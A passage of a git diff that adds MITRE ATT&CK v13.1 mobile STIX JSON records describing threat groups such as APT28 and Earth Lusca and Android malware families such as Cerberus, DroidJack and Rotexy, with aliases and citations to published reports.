a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json new file mode 100644 index 0000000000000000000000000000000000000000..13dc5bf1ee589eee7ddb0aae80a2c460b834ff6b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c.json @@ -0,0 +1,228 @@ +{ + "type": "bundle", + "id": "bundle--7fc547b6-c94c-41ab-9743-392182aff60d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T17:51:20.401Z", + "name": "APT28", + "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). ", + "aliases": [ + "APT28", + "IRON TWILIGHT", + "SNAKEMACKEREL", + "Swallowtail", + "Group 74", + "Sednit", + "Sofacy", + "Pawn Storm", + "Fancy Bear", + "STRONTIUM", + "Tsar Team", + "Threat Group-4127", + "TG-4127" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "4.0", + "x_mitre_contributors": [ + "S\u00e9bastien Ruel, CGI", + "Drew Church, Splunk", + "Emily Ratliff, IBM", + "Richard Gold, Digital Shadows" + ], + "type": "intrusion-set", + "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", + "created": "2017-05-31T21:31:48.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0007", + "external_id": "G0007" + }, + { + "source_name": "SNAKEMACKEREL", + "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)" + }, + { + "source_name": "Fancy Bear", + "description": "(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "Tsar Team", + "description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "APT28", + "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "STRONTIUM", + "description": "(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)" + }, + { + "source_name": "IRON TWILIGHT", + "description": "(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)" + }, + { + "source_name": "Threat Group-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "TG-4127", + "description": "(Citation: SecureWorks TG-4127)" + }, + { + "source_name": "Pawn Storm", + "description": "(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) " + }, + { + "source_name": "Swallowtail", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "Group 74", + "description": "(Citation: Talos Seduploader Oct 2017)" + }, + { + "source_name": "Accenture SNAKEMACKEREL Nov 2018", + "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.", + "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017.", + "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + }, + { + "source_name": "ESET Zebrocy May 2019", + "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.", + "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/" + }, + { + "source_name": "ESET Sednit Part 3", + "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + }, + { + "source_name": "Sofacy DealersChoice", + "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" + }, + { + "source_name": "FireEye APT28 January 2017", + "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" + }, + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "Ars Technica GRU indictment Jul 2018", + "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.", + "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/" + }, + { + "source_name": "TrendMicro Pawn Storm Dec 2020", + "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm\u2019s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.", + "url": "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html" + }, + { + "source_name": "Securelist Sofacy Feb 2018", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.", + "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "Palo Alto Sofacy 06-2018", + "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + }, + { + "source_name": "Talos Seduploader Oct 2017", + "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.", + "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html" + }, + { + "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/" + }, + { + "source_name": "Microsoft STRONTIUM Aug 2019", + "description": "MSRC Team. (2019, August 5). Corporate IoT \u2013 a path to intrusion. Retrieved August 16, 2019.", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/" + }, + { + "source_name": "DOJ GRU Indictment Jul 2018", + "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", + "url": "https://www.justice.gov/file/1080281/download" + }, + { + "source_name": "Cybersecurity Advisory GRU Brute Force Campaign July 2021", + "description": "NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.", + "url": "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" + }, + { + "source_name": "NSA/FBI Drovorub August 2020", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF" + }, + { + "source_name": "SecureWorks TG-4127", + "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.", + "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign" + }, + { + "source_name": "Secureworks IRON TWILIGHT Active Measures March 2017", + "description": "Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.", + "url": "https://www.secureworks.com/research/iron-twilight-supports-active-measures" + }, + { + "source_name": "Secureworks IRON TWILIGHT Profile", + "description": "Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-twilight" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" + }, + { + "source_name": "Sednit", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)" + }, + { + "source_name": "Sofacy", + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034.json b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034.json new file mode 100644 index 0000000000000000000000000000000000000000..0e0379a6909dc9831113c1c743fd5316c30b05e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/intrusion-set/intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--ff9eff1c-ed23-460d-9ffb-cda4c583cb47", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-17T19:51:56.531Z", + "name": "Earth Lusca", + "description": "[Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)\n\n[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)", + "aliases": [ + "Earth Lusca", + "TAG-22" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034", + "created": "2022-07-01T20:12:30.184Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1006", + "external_id": "G1006" + }, + { + "source_name": "TAG-22", + "description": "(Citation: Recorded Future TAG-22 July 2021)" + }, + { + "source_name": "TrendMicro EarthLusca 2022", + "description": "Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca\u2019s Operations. Retrieved July 1, 2022.", + "url": "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" + }, + { + "source_name": "Recorded Future TAG-22 July 2021", + "description": "INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.", + "url": "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--007ebf84-4e14-44c7-a5aa-151d5de85320.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--007ebf84-4e14-44c7-a5aa-151d5de85320.json new file mode 100644 index 0000000000000000000000000000000000000000..36e4653bcb0a2437cb4ea4118974bf8b6254e8a0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--007ebf84-4e14-44c7-a5aa-151d5de85320.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--f5c3a1e8-8ba1-46ed-a222-f96ffbf14117", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "CarbonSteal" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "type": "malware", + "created": "2020-11-10T16:50:38.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0529", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0529" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-09-20T13:54:19.819Z", + "name": "CarbonSteal", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) is one of a family of four surveillanceware tools that share a common C2 infrastructure. [CarbonSteal](https://attack.mitre.org/software/S0529) primarily deals with audio surveillance. (Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9.json new file mode 100644 index 0000000000000000000000000000000000000000..3a76d7bfa053d0b1ae39670ee21a49cf81015db1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--c15b4cf3-aa90-45be-823b-4e487eb79524", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Cerberus" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "type": "malware", + "created": "2020-06-26T15:32:24.569Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0480", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0480" + }, + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "modified": "2020-09-11T15:43:49.079Z", + "name": "Cerberus", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) is a banking trojan whose usage can be rented on underground forums and marketplaces. Prior to being available to rent, the authors of [Cerberus](https://attack.mitre.org/software/S0480) claim was used in private operations for two years.(Citation: Threat Fabric Cerberus)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1.json new file mode 100644 index 0000000000000000000000000000000000000000..7d3d250d6428156a04ed6893e0e23cda6d6f3100 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--57f7e21e-562d-47f1-8943-9d01452c7d2f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "DroidJack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "created": "2017-10-25T14:48:40.571Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0320", + "url": "https://attack.mitre.org/software/S0320" + }, + { + "source_name": "DroidJack", + "description": "(Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)" + }, + { + "source_name": "Proofpoint-Droidjack", + "url": "https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-app", + "description": "Proofpoint. (2016, July 7). DroidJack Uses Side-Load\u2026It's Super Effective! Backdoored Pokemon GO Android App Found. Retrieved January 20, 2017." + }, + { + "source_name": "Zscaler-SuperMarioRun", + "url": "https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 \u2013 DroidJack RAT. Retrieved January 20, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[DroidJack](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. (Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)", + "modified": "2022-05-20T17:13:16.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DroidJack", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0626c181-93cb-4860-9cb0-dff3b1c13063.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0626c181-93cb-4860-9cb0-dff3b1c13063.json new file mode 100644 index 0000000000000000000000000000000000000000..9636f0d5a429dd1289b672ccba3c1897d9c30c5b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0626c181-93cb-4860-9cb0-dff3b1c13063.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--5ff2e917-8bbe-4331-8856-6c7ea7c4ec6f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Rotexy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "type": "malware", + "created": "2019-09-23T13:36:07.816Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0411", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0411" + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan \u2013 banker and ransomware. Retrieved September 23, 2019." + } + ], + "modified": "2020-09-11T15:53:38.216Z", + "name": "Rotexy", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) is an Android banking malware that has evolved over several years. It was originally an SMS spyware Trojan first spotted in October 2014, and since then has evolved to contain more features, including ransomware functionality.(Citation: securelist rotexy 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--085eb36d-697d-4d9a-bac3-96eb879fe73c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--085eb36d-697d-4d9a-bac3-96eb879fe73c.json new file mode 100644 index 0000000000000000000000000000000000000000..b604bef0e549de6240d4cf725920ff6a3af6e99c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--085eb36d-697d-4d9a-bac3-96eb879fe73c.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--76fcd982-8126-4e0e-b45c-9ae3a8725c2f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Stealth Mango", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Stealth Mango" + ], + "type": "malware", + "id": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0328", + "external_id": "S0328" + }, + { + "source_name": "Stealth Mango", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--08784a9d-09e9-4dce-a839-9612398214e8.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--08784a9d-09e9-4dce-a839-9612398214e8.json new file mode 100644 index 0000000000000000000000000000000000000000..b3a382c943d2420c0cb859f75dca73148438904e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--08784a9d-09e9-4dce-a839-9612398214e8.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--2879eeb7-7ae8-4427-a169-bf3189125418", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Allwinner", + "description": "[Allwinner](https://attack.mitre.org/software/S0319) is a company that supplies processors used in Android tablets and other devices. A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) for use on these devices reportedly contained a backdoor. (Citation: HackerNews-Allwinner)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--08784a9d-09e9-4dce-a839-9612398214e8", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0319", + "external_id": "S0319" + }, + { + "source_name": "Allwinner", + "description": "(Citation: HackerNews-Allwinner)" + }, + { + "source_name": "HackerNews-Allwinner", + "description": "Mohit Kumar. (2016, May 11). Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker. Retrieved September 18, 2018.", + "url": "https://thehackernews.com/2016/05/android-kernal-exploit.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0b9c5d11-651a-4378-b129-5c584d0242c5.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0b9c5d11-651a-4378-b129-5c584d0242c5.json new file mode 100644 index 0000000000000000000000000000000000000000..53b22433f8102b0a2fa0528e58896657ae591e46 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--0b9c5d11-651a-4378-b129-5c584d0242c5.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": 